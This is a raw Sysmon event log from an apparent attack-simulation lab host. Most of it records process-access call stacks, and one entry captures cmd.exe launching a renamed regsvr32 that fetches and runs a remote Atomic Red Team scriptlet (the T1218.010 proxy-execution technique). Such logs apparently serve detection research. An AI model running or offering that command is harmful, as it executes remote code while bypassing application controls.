22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361501Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361500Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361499Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361498Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361497Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361496Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361495Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361494Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361493Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361492Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361491Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361490Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361489Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361488Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361487Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361486Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361485Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361484Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361483Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361482Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-3708-6013-b403-000000001100}407210904C:\Windows\system32\cmd.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361481Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.051{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Temp\notregsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" 10341000x8000000000000000361480Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361479Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.038{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCR